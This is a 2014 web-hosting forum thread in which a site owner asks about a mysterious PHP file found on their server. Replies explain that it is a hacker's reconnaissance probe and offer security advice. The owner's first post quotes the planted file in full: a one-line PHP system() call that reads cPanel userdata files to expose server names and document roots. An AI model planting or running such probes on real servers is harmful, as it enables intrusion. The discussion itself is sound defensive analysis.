homepage Welcome to WebmasterWorld Guest from 54.226.213.228
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque

Webmaster General Forum

    
Mysterious file on my server
virtualreality




msg:4646965
 7:51 am on Feb 20, 2014 (gmt 0)

Hello, yesterday a mysterious file appeared on my server - sadfsdfsdf.php. The host says they dont know anything about how it happened but I dont trust them because their customer service is really bad. The content of the file is:


<?PHP echo system('FILES=/var/cpanel/userdata/myusernamehere/*;for i in $FILES;do egrep "servername|documentroot" $i | awk \'{print $1,$2}\' | egrep "^servername|^documentroot";echo ;done'); ?>

Can anyone translate what this code means? Many thanks!

 

phranque




msg:4647068
 10:52 am on Feb 20, 2014 (gmt 0)

this script could be used to expose information about your web server configuration.

essentially it means - print out the first two fields of every row that contains "servername" or "documentroot" in any file in the /var/cpanel/userdata/myusernamehere/ directory.

virtualreality




msg:4647074
 11:16 am on Feb 20, 2014 (gmt 0)

Thanks. Is that something the server people put and do not want to say they did? or could it be a hack, if so what benefit a hacker can have from this info?

lucy24




msg:4647279
 10:45 pm on Feb 20, 2014 (gmt 0)

I can't imagine the server administrators asking for information that they already have. Unless they're testing code-- and they wouldn't do that on some random customer's site!

For the hacker it's a preliminary inquiry. The information itself may or may not be useful; what they really want to know is whether they're able to get the information in the first place.

Hacking comes in many forms. What you've got here is a two-step approach. First comes the data collection, like your file, or checking whether they're able to "PUT" a file. If the first test comes up positive, they'll be back for bigger and nastier ventures.

I assume you removed the file the instant you found it. Did it come back?

phranque




msg:4647311
 12:20 am on Feb 21, 2014 (gmt 0)

Not only that it tells the hacker you have a cpanel installation which would allow them to take advantage of a potential cpanel vulnerability.

virtualreality




msg:4647457
 12:48 pm on Feb 21, 2014 (gmt 0)

Yes I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

lucy24




msg:4647466
 1:31 pm on Feb 21, 2014 (gmt 0)

The host says they dont know anything about how it happened but I dont trust them

:: twiddling thumbs ::

virtualreality




msg:4647471
 1:55 pm on Feb 21, 2014 (gmt 0)

Their exact reply was:

It is important to remember that when it comes to the security of your site, it is your responsibility to make sure that none of the files you upload can be hacked. The server is secure, and I assure that is not how any hacker got in, if that is what happened. If they did get it, it was through your files that you uploaded. It is highly recommended that you determine if this file is intended or not, and then make sure that you always secure your files, to insure that hackers are not able to break in through the files and upload malware. Thank you.

lucy24




msg:4647596
 9:27 pm on Feb 21, 2014 (gmt 0)

They think it's your fault your site got hacked? Well, maybe if your FTP password is "password" and your username* is "user" ...


* Notice how in movies-- the ones where they get the password within three guesses-- they never, ever have to figure out the username first?

Samizdata




msg:4647612
 10:19 pm on Feb 21, 2014 (gmt 0)

I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

Consider how they got your username and password in the first place.

One obvious possibility is a trojan on your computer.

...

Jonesy




msg:4648386
 10:22 pm on Feb 23, 2014 (gmt 0)

Consider how they got your username and password in the first place.
One obvious possibility is a trojan on your computer.

Another possibility is using the same username and password
in many other sites, and one of them got cracked badly.
Jonesy

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved